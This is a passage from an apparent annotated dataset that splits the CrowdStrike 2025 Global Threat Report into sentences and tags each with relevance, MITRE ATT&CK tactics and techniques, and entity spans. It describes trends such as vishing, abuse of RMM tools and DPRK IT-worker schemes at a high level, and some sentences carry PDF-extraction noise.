"46_crowdstrike_report", "page_number": 2, "sentence_id": 5, "context_before": "Take generative artificial intelligence (genAI), for instance.", "sentence_text": "The “force multiplier” impact of off-the-shelf chatbots has made genAI a popular addition to the global hacker toolbox.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s6-e2dedd", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 6, "context_before": "The “force multiplier” impact of off-the-shelf chatbots has made genAI a popular addition to the global hacker toolbox.", "sentence_text": "It’s shortening their learning curve and development cycles, and it’s allowing them to increase the scale and pace of their activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s7-be297e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 7, "context_before": "It’s shortening their learning curve and development cycles, and it’s allowing them to increase the scale and pace of their activities.", "sentence_text": "Though this report indicates that malicious use of AI is growing, it remains largely iterative and evolutionary at this point in time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s8-fd9fe6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 8, "context_before": "Though this report indicates that malicious use of AI is growing, it remains largely iterative and evolutionary at this point in time.", "sentence_text": "Only occasionally does it manifest as an entirely novel use case.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s9-a8563c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 9, "context_before": "Only occasionally does it manifest as an entirely novel use case.", "sentence_text": "But it is still early days.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s10-e25f1e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 10, "context_before": "But it is still early days.", "sentence_text": "At CrowdStrike, we aren’t waiting for threat actors to experience their next “aha” moment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s11-01d2e9", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 11, "context_before": "At CrowdStrike, we aren’t waiting for threat actors to experience their next “aha” moment.", "sentence_text": "We are accelerating our own use of AI techniques — from our foundational machine learning capabilities to our leading-edge generative and agentic AI models — to help our customers anticipate the next zero-day attacks in advance and proactively inoculate themselves against them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s12-8d3850", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 12, "context_before": "We are accelerating our own use of AI techniques — from our foundational machine learning capabilities to our leading-edge generative and agentic AI models — to help our customers anticipate the next zero-day attacks in advance and proactively inoculate themselves against them.", "sentence_text": "This is the essence of an AI-native approach to cyber defense.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s13-e551aa", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 13, "context_before": "This is the essence of an AI-native approach to cyber defense.", "sentence_text": "Unlike legacy systems — which are still relied upon by organizations globally — we don’t sit idle until an attack occurs before we can identify and stop it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s14-442e06", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 14, "context_before": "Unlike legacy systems — which are still relied upon by organizations globally — we don’t sit idle until an attack occurs before we can identify and stop it.", "sentence_text": "Adversarial Enterprise Takes Its Toll", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s15-a58376", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 15, "context_before": "Adversarial Enterprise Takes Its Toll", "sentence_text": "The job of protecting your organizations continues to get harder by the day.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s16-cf3991", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 16, "context_before": "The job of protecting your organizations continues to get harder by the day.", "sentence_text": "You’ll find ample evidence of this fact in the data that follows.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p2-s17-5a3a2d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 2, "sentence_id": 17, "context_before": "You’ll find ample evidence of this fact in the data that follows.", "sentence_text": "The number of new “named adversaries” tracked by the elite CrowdStrike Counter Adversary Operations team continues to expand, and established adversaries are constantly adding new targets and more sophisticated techniques to their evasion, intrusion, and exfiltration arsenals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p3-s18-21aa67", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 3, "sentence_id": 18, "context_before": "The number of new “named adversaries” tracked by the elite CrowdStrike Counter Adversary Operations team continues to expand, and established adversaries are constantly adding new targets and more sophisticated techniques to their evasion, intrusion, and exfiltration arsenals.", "sentence_text": "Here are a few key facts you should know about the shifting threat landscape:\n• Breakout time — how long it takes for an adversary to start moving laterally across your network — reached an all-time low in the past year:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p3-s19-4f2157", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 3, "sentence_id": 19, "context_before": "Here are a few key facts you should know about the shifting threat landscape:\n• Breakout time — how long it takes for an adversary to start moving laterally across your network — reached an all-time low in the past year:", "sentence_text": "The average fell to 48 minutes, and the fastest breakout time we observed dropped to a mere 51 seconds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p3-s20-4922eb", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 3, "sentence_id": 20, "context_before": "The average fell to 48 minutes, and the fastest breakout time we observed dropped to a mere 51 seconds.", "sentence_text": "• Voice phishing (vishing) attacks, where adversaries call victims to amplify their activities with persuasive social engineering techniques, saw explosive growth — up 442% between the first and second half of 2024.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.004", "name": "Phishing: Voice Phishing" } ], "procedure": "Call victims using voice phishing to persuade them and support malicious activities.", "entities": [ { "text": "adversaries", "start": 42, "end": 53, "label": "ThreatActor" }, { "text": "call victims to amplify their activities with persuasive social engineering techniques", "start": 54, "end": 140, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p3-s21-133b7b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 3, "sentence_id": 21, "context_before": "• Voice phishing (vishing) attacks, where adversaries call victims to amplify their activities with persuasive social engineering techniques, saw explosive growth — up 442% between the first and second half of 2024.", "sentence_text": "• Attacks related to initial access boomed, accounting for 52% of vulnerabilities observed by CrowdStrike in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p3-s22-46d13d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 3, "sentence_id": 22, "context_before": "• Attacks related to initial access boomed, accounting for 52% of vulnerabilities observed by CrowdStrike in 2024.", "sentence_text": "Providing access as a service became a thriving business, as advertisements for access brokers increased 50% year-over-year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p3-s23-198ce4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 3, "sentence_id": 23, "context_before": "Providing access as a service became a thriving business, as advertisements for access brokers increased 50% year-over-year.", "sentence_text": "• GenAI played a pivotal role in sophisticated cyberattack campaigns in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p3-s24-95750f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 3, "sentence_id": 24, "context_before": "• GenAI played a pivotal role in sophisticated cyberattack campaigns in 2024.", "sentence_text": "It enabled FAMOUS CHOLLIMA to create highly convincing fake IT job candidates that infiltrated victim organizations, and it helped China-, Russia-, and Iran-affiliated threat actors conduct AI-driven disinformation and influence operations to disrupt elections.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1585.001", "name": "Establish Accounts: Social Media Accounts" }, { "id": "T1585.002", "name": "Establish Accounts: Email Accounts" } ], "procedure": "Create convincing fake IT job candidate personas to infiltrate victim organizations.", "entities": [ { "text": "FAMOUS CHOLLIMA", "start": 11, "end": 26, "label": "ThreatActor" }, { "text": "create highly convincing fake IT job candidates that infiltrated victim organizations", "start": 30, "end": 115, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p3-s25-755fb2", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 3, "sentence_id": 25, "context_before": "It enabled FAMOUS CHOLLIMA to create highly convincing fake IT job candidates that infiltrated victim organizations, and it helped China-, Russia-, and Iran-affiliated threat actors conduct AI-driven disinformation and influence operations to disrupt elections.", "sentence_text": "»FOR MORE INFORMATION ON ANY OF THE ADVERSARIES MENTIONED IN THIS single-minded vision and mission on which the company was founded INDUSTRY OR REGION, CHECK OUT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p3-s26-e3dcb8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 3, "sentence_id": 26, "context_before": "»FOR MORE INFORMATION ON ANY OF THE ADVERSARIES MENTIONED IN THIS single-minded vision and mission on which the company was founded INDUSTRY OR REGION, CHECK OUT", "sentence_text": "THE more than a decade ago.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p4-s27-00a1a6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 4, "sentence_id": 27, "context_before": "THE more than a decade ago.", "sentence_text": "Table of\nContents\nIntroduction 5\nNaming Conventions 8 Threat Landscape Overview 9 Key Adversary Themes 15 The Business of Social Engineering 15 Generative Artificial Intelligence and the Enterprising Adversary 19 China’s Cyber Enterprise 25 Cloud-Conscious Threat Actors Continue to Innovate 29 Enterprising Vulnerability Exploitation 34 SaaS Exploitation Likely to Continue 40 Conclusion 43 Recommendations 45 About CrowdStrike 53", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s28-82c2ef", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 28, "context_before": "Table of\nContents\nIntroduction 5\nNaming Conventions 8 Threat Landscape Overview 9 Key Adversary Themes 15 The Business of Social Engineering 15 Generative Artificial Intelligence and the Enterprising Adversary 19 China’s Cyber Enterprise 25 Cloud-Conscious Threat Actors Continue to Innovate 29 Enterprising Vulnerability Exploitation 34 SaaS Exploitation Likely to Continue 40 Conclusion 43 Recommendations 45 About CrowdStrike 53", "sentence_text": "Introduction\nThe CrowdStrike 2025 Global Threat Report is the industry’s preeminent source on adversary intelligence, examining the emerging adversary trends of the past year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s29-b13f24", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 29, "context_before": "Introduction\nThe CrowdStrike 2025 Global Threat Report is the industry’s preeminent source on adversary intelligence, examining the emerging adversary trends of the past year.", "sentence_text": "2024 was the year of the enterprising adversary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s30-550ad4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 30, "context_before": "2024 was the year of the enterprising adversary.", "sentence_text": "eCrime adversaries exemplified such enterprising cyberattacks, constantly adapting to shifting environments and quickly scaling effective operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s31-571e63", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 31, "context_before": "eCrime adversaries exemplified such enterprising cyberattacks, constantly adapting to shifting environments and quickly scaling effective operations.", "sentence_text": "Throughout 2024, initial access techniques began to shift — eCrime adversaries began moving away from phishing to alternative access methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s32-c1b0fd", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 32, "context_before": "Throughout 2024, initial access techniques began to shift — eCrime adversaries began moving away from phishing to alternative access methods.", "sentence_text": "This shift suggests that commodity malware operators are likely finding more effective and successful infections with innovative techniques as they face hardened security defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s33-fbaafa", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 33, "context_before": "This shift suggests that commodity malware operators are likely finding more effective and successful infections with innovative techniques as they face hardened security defenses.", "sentence_text": "One such technique that proliferated in 2024 is social engineering leveraging telephony-based exploitation: Various eCrime adversaries are increasingly adopting vishing, callback phishing, and help desk social engineering attacks to gain a foothold into networks.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.004", "name": "Phishing: Voice Phishing" } ], "procedure": "Use vishing, callback phishing, and help desk social engineering to gain initial access to networks.", "entities": [ { "text": "Various eCrime adversaries", "start": 108, "end": 134, "label": "ThreatActor" }, { "text": "adopting vishing, callback phishing, and help desk social engineering attacks to gain a foothold into networks", "start": 152, "end": 262, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s34-fd4a34", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 34, "context_before": "One such technique that proliferated in 2024 is social engineering leveraging telephony-based exploitation: Various eCrime adversaries are increasingly adopting vishing, callback phishing, and help desk social engineering attacks to gain a foothold into networks.", "sentence_text": "These shifting initial access methods are consistent with a larger trend identified in the CrowdStrike 2024 Threat Hunting Report: Rather than delivering malware, eCrime adversaries are increasingly leveraging legitimate remote monitoring and management (RMM) tools to access a victim’s system — and therefore making malware non-essential for successful operations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Software" } ], "procedure": "Leverage legitimate remote monitoring and management tools to access a victim system.", "entities": [ { "text": "eCrime adversaries", "start": 163, "end": 181, "label": "ThreatActor" }, { "text": "leveraging legitimate remote monitoring and management (RMM) tools to access a victim’s system", "start": 199, "end": 293, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s35-ec73cc", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 35, "context_before": "These shifting initial access methods are consistent with a larger trend identified in the CrowdStrike 2024 Threat Hunting Report: Rather than delivering malware, eCrime adversaries are increasingly leveraging legitimate remote monitoring and management (RMM) tools to access a victim’s system — and therefore making malware non-essential for successful operations.", "sentence_text": "Throughout 2024, eCrime actors frequently leveraged RMM tools in their campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Software" } ], "procedure": "Leverage RMM tools during campaigns to access victim systems.", "entities": [ { "text": "eCrime actors", "start": 17, "end": 30, "label": "ThreatActor" }, { "text": "leveraged RMM tools in their campaigns", "start": 42, "end": 80, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s36-318ec0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 36, "context_before": "Throughout 2024, eCrime actors frequently leveraged RMM tools in their campaigns.", "sentence_text": "Decades of government investment into China’s cyber workforce and programs have yielded matured capabilities and efficiencies as well as an increasing number of new, specialized China-nexus adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s37-0a0a11", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 37, "context_before": "Decades of government investment into China’s cyber workforce and programs have yielded matured capabilities and efficiencies as well as an increasing number of new, specialized China-nexus adversaries.", "sentence_text": "In 2024, CrowdStrike graduated seven new China-nexus adversaries and observed a 150% increase in China-nexus activity across all sectors on average compared to 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p5-s38-131017", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 5, "sentence_id": 38, "context_before": "In 2024, CrowdStrike graduated seven new China-nexus adversaries and observed a 150% increase in China-nexus activity across all sectors on average compared to 2023.", "sentence_text": "Additionally, China-nexus adversaries increasingly prioritized operations security (OPSEC) and at-scale infrastructure management by obfuscating their activities via operational relay box (ORB) networks.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1584", "name": "Compromise Infrastructure" } ], "procedure": "Obfuscate adversary activity and manage infrastructure at scale through operational relay box networks.", "entities": [ { "text": "China-nexus adversaries", "start": 14, "end": 37, "label": "ThreatActor" }, { "text": "obfuscating their activities via operational relay box (ORB) networks", "start": 133, "end": 202, "label": "Action" }, { "text": "operational relay box (ORB) networks", "start": 166, "end": 202, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s39-e7e694", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 39, "context_before": "Additionally, China-nexus adversaries increasingly prioritized operations security (OPSEC) and at-scale infrastructure management by obfuscating their activities via operational relay box (ORB) networks.", "sentence_text": "Notably, FAMOUS CHOLLIMA innovated their currency generation operations in 2024 by leveraging their IT worker schemes at scale across the globe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s40-97736c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 40, "context_before": "Notably, FAMOUS CHOLLIMA innovated their currency generation operations in 2024 by leveraging their IT worker schemes at scale across the globe.", "sentence_text": "While DPRK adversaries have skillfully shifted their operations to support large-scale currency generation over the years, the specific tactics deployed in their 2024 operations — such as leveraging virtual interviews, allocating significant resources and staffing, and using laptop farms at scale — highlight the DPRK’s enterprising approach to computer network operations (CNO).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Leverage virtual interviews, allocate operational resources and staffing, and use laptop farms at scale to support operations.", "entities": [ { "text": "DPRK adversaries", "start": 6, "end": 22, "label": "ThreatActor" }, { "text": "leveraging virtual interviews, allocating significant resources and staffing, and using laptop farms at scale", "start": 188, "end": 297, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s41-152328", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 41, "context_before": "While DPRK adversaries have skillfully shifted their operations to support large-scale currency generation over the years, the specific tactics deployed in their 2024 operations — such as leveraging virtual interviews, allocating significant resources and staffing, and using laptop farms at scale — highlight the DPRK’s enterprising approach to computer network operations (CNO).", "sentence_text": "Across the 2024 vulnerability threat landscape, threat actors continued to target devices in the network periphery and regularly leveraged publicly available vulnerability research — such as disclosures, technical blogs, and proof-of-concept (POC) exploits — to aid their malicious activity.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Threat actors target network periphery devices and leverage publicly available vulnerability research, including proof-of-concept exploits, to support exploitation activities.", "entities": [ { "text": "threat actors", "start": 48, "end": 61, "label": "ThreatActor" }, { "text": "continued to target devices in the network periphery", "start": 62, "end": 114, "label": "Action" }, { "text": "regularly leveraged publicly available vulnerability research — such as disclosures, technical blogs, and proof-of-concept (POC) exploits — to aid their malicious activity", "start": 119, "end": 290, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s42-ccf51c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 42, "context_before": "Across the 2024 vulnerability threat landscape, threat actors continued to target devices in the network periphery and regularly leveraged publicly available vulnerability research — such as disclosures, technical blogs, and proof-of-concept (POC) exploits — to aid their malicious activity.", "sentence_text": "Within the cloud landscape, an increasing number of new adversaries effectively exploited cloud environments, often employing previously tested techniques and adapting them for their own goals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s43-abe153", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 43, "context_before": "Within the cloud landscape, an increasing number of new adversaries effectively exploited cloud environments, often employing previously tested techniques and adapting them for their own goals.", "sentence_text": "Adversaries also leveraged genAI when conducting intelligence operations (IO)\ntargeting election processes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s44-53a68d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 44, "context_before": "Adversaries also leveraged genAI when conducting intelligence operations (IO)\ntargeting election processes.", "sentence_text": "Staying one step ahead of the enterprising adversary is difficult — but not impossible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s45-25c4cc", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 45, "context_before": "Staying one step ahead of the enterprising adversary is difficult — but not impossible.", "sentence_text": "As the adversary matures, so do your defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s46-749617", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 46, "context_before": "As the adversary matures, so do your defenses.", "sentence_text": "As the adversary innovates, so does CrowdStrike.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s47-2a4ad2", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 47, "context_before": "As the adversary innovates, so does CrowdStrike.", "sentence_text": "WITH NEARLY 40% OF THESE REPRESENTING INSIDER Counter Adversary Operations comprises two closely integrated teams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s48-bfd95a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 48, "context_before": "WITH NEARLY 40% OF THESE REPRESENTING INSIDER Counter Adversary Operations comprises two closely integrated teams.", "sentence_text": "THREAT OPERATIONS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p6-s49-b86a06", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 6, "sentence_id": 49, "context_before": "THREAT OPERATIONS.", "sentence_text": "The CrowdStrike OverWatch team uses this intelligence to conduct proactive threat hunting across customer telemetry to detect and address malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p7-s50-c9c94f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 7, "sentence_id": 50, "context_before": "The CrowdStrike OverWatch team uses this intelligence to conduct proactive threat hunting across customer telemetry to detect and address malicious activity.", "sentence_text": "During 2024, CrowdStrike Intelligence introduced 26 newly named adversaries — including the new Kazakhstan-based adversary COMRADE SAIGA — raising the total number of named adversaries tracked across all motivations to 257.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p7-s51-69ff3e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 7, "sentence_id": 51, "context_before": "During 2024, CrowdStrike Intelligence introduced 26 newly named adversaries — including the new Kazakhstan-based adversary COMRADE SAIGA — raising the total number of named adversaries tracked across all motivations to 257.", "sentence_text": "In addition to named adversaries, CrowdStrike Intelligence tracks more than 140 active malicious activity clusters and emerging threat groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p7-s52-9b17eb", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 7, "sentence_id": 52, "context_before": "In addition to named adversaries, CrowdStrike Intelligence tracks more than 140 active malicious activity clusters and emerging threat groups.", "sentence_text": "In the past year, CrowdStrike has been working to enrich the in-platform Falcon experience by providing further insights from CrowdStrike’s broad view into the changing threat landscape in different industries and regions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p7-s53-9a265f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 7, "sentence_id": 53, "context_before": "In the past year, CrowdStrike has been working to enrich the in-platform Falcon experience by providing further insights from CrowdStrike’s broad view into the changing threat landscape in different industries and regions.", "sentence_text": "perimeter by monitoring the criminal underground and emerging threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p7-s54-a420fa", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 7, "sentence_id": 54, "context_before": "perimeter by monitoring the criminal underground and emerging threats.", "sentence_text": "New dashboards provide insight into Falcon Adversary OverWatch threat hunting findings across CrowdStrike’s customer ecosystem, while click-to-hunt capabilities enable seamless transition from new threat hunting query feeds to real-time investigations in CrowdStrike Falcon®", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p7-s55-0fa40a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 7, "sentence_id": 55, "context_before": "New dashboards provide insight into Falcon Adversary OverWatch threat hunting findings across CrowdStrike’s customer ecosystem, while click-to-hunt capabilities enable seamless transition from new threat hunting query feeds to real-time investigations in CrowdStrike Falcon®", "sentence_text": "Next-Gen SIEM.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p7-s56-f58aa0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 7, "sentence_id": 56, "context_before": "Next-Gen SIEM.", "sentence_text": "Additionally, new Counter Adversary Playbooks make it easy to build comprehensive intelligence monitoring programs customized for any organization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p7-s57-a6463b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 7, "sentence_id": 57, "context_before": "Additionally, new Counter Adversary Playbooks make it easy to build comprehensive intelligence monitoring programs customized for any organization.", "sentence_text": "This annual report also includes anticipatory threat assessments to help prepare and protect organizations throughout the coming year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p7-s58-f3eaf6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 7, "sentence_id": 58, "context_before": "This annual report also includes anticipatory threat assessments to help prepare and protect organizations throughout the coming year.", "sentence_text": "»\nNEW ADVERSARIES NAMED IN 2024 TOTAL ADVERSARIES NOW TRACKED", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p7-s59-b27aee", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 7, "sentence_id": 59, "context_before": "»\nNEW ADVERSARIES NAMED IN 2024 TOTAL ADVERSARIES NOW TRACKED", "sentence_text": "BY CROWDSTRIKE ACTIVE MALICIOUS ACTIVITY CLUSTERS AND EMERGING THREAT GROUPS TRACKED", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p8-s60-b8801f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 8, "sentence_id": 60, "context_before": "BY CROWDSTRIKE ACTIVE MALICIOUS ACTIVITY CLUSTERS AND EMERGING THREAT GROUPS TRACKED", "sentence_text": "ADVERSARY NATION-STATE OR CATEGORY BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA) CONVENTIONS CRANE ROK (REPUBLIC OF KOREA)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p8-s61-e3106d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 8, "sentence_id": 61, "context_before": "ADVERSARY NATION-STATE OR CATEGORY BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA) CONVENTIONS 